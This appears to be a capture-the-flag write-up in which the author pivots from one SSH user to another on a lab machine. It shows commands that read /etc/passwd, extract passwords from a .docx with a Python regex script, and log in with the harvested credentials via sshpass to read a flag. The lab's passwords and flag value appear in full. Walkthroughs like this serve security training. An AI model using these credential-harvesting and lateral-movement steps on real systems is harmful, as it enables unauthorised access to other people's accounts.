Spray and Pray - II
192.168.1.20OWASPKL{xxx}1. Challenge Overview
Pivot from the abel foothold (Part I) to niki and read local2.txt. Credentials are hidden inside a .docx in abel's Documents.
2. Initial Reconnaissance
2.1 Confirm service + enumerate users
1nmap -sC -sV -p- -T4 192.168.1.20 -oA spray2_nmap_full2sshpass -p 'angel1' ssh -o StrictHostKeyChecking=no abel@192.168.1.20 "id; grep ':/bin/bash' /etc/passwd"122/tcp open ssh OpenSSH 10.2p1 Ubuntu 2ubuntu3.22uid=1006(abel) gid=1006(abel) groups=1006(abel)3spraynpray:x:1000:1000:...:/bin/bash4niki:x:1004:1004::/home/niki:/bin/bash5abel:x:1006:1006::/home/abel:/bin/bash3. Analysis / Forensics Path
3.1 Locate the credential document
1sshpass -p 'angel1' ssh -o StrictHostKeyChecking=no abel@192.168.1.20 "ls -la /home/abel/Documents"1-rw-rw-r-- 1 niki niki 16335 May 23 19:34 Minit_Mesyuarat_2026_Password_Guideline.docx3.2 Extract candidate creds from the .docx
A .docx is a zip; I parsed word/document.xml and filtered for hashes / password-shaped tokens (pattern-based, not hardcoded).
1cat <<'PY' | sshpass -p 'angel1' ssh -o StrictHostKeyChecking=no abel@192.168.1.20 'python3 -'2import zipfile,re3p='/home/abel/Documents/Minit_Mesyuarat_2026_Password_Guideline.docx'4s=zipfile.ZipFile(p).read('word/document.xml').decode('utf-8','ignore')5for t in sorted(set(re.findall(r"[A-Za-z0-9_@!]{8,}", s))):6 if re.fullmatch(r"[A-Fa-f0-9]{32}", t) or (any(c.isdigit() for c in t) and ('@' in t or '_' in t or 'Password' in t)):7 print(t)8PY1C5c56879cbb62d314bf76582c78bcfb72Password1233abel_0411@weekndbuk1tj4lil4niki_ily3000@20194. Exploitation / Recovery
4.1 Pivot to niki, hunt the flag, then read it
1sshpass -p 'abel_0411@weekndbuk1tj4lil' ssh -o StrictHostKeyChecking=no niki@192.168.1.20 "id; grep -Rns 'OWASPKL{' /home/niki 2>/dev/null; ls -la /home/niki/Desktop/local2.txt; cat /home/niki/Desktop/local2.txt"1uid=1004(niki) gid=1004(niki) groups=1004(niki)2/home/niki/Desktop/local2.txt:1:OWASPKL{d73aa3d24c1fb6ce993a38efe5505369}3-rw-rw-r-- 1 niki niki 42 May 23 20:14 /home/niki/Desktop/local2.txt4OWASPKL{d73aa3d24c1fb6ce993a38efe5505369}> Re-validated live on 2026-05-31 via Kali (192.168.1.10): niki:abel_0411@weekndbuk1tj4lil logged in and returned the flag above.
5. Flag
6. Summary of Approach & Key Takeaways
Logged in as abel, enumerated /etc/passwd users.
Found a password-guideline .docx in abel's Documents.
Parsed word/document.xml for credential-shaped tokens.
Pivoted to niki with abel_0411@weekndbuk1tj4lil.
Read /home/niki/Desktop/local2.txt.
Office docs are zip archives; grep word/document.xml for leaked secrets.
Pattern-based extraction avoids guessing which token is the password.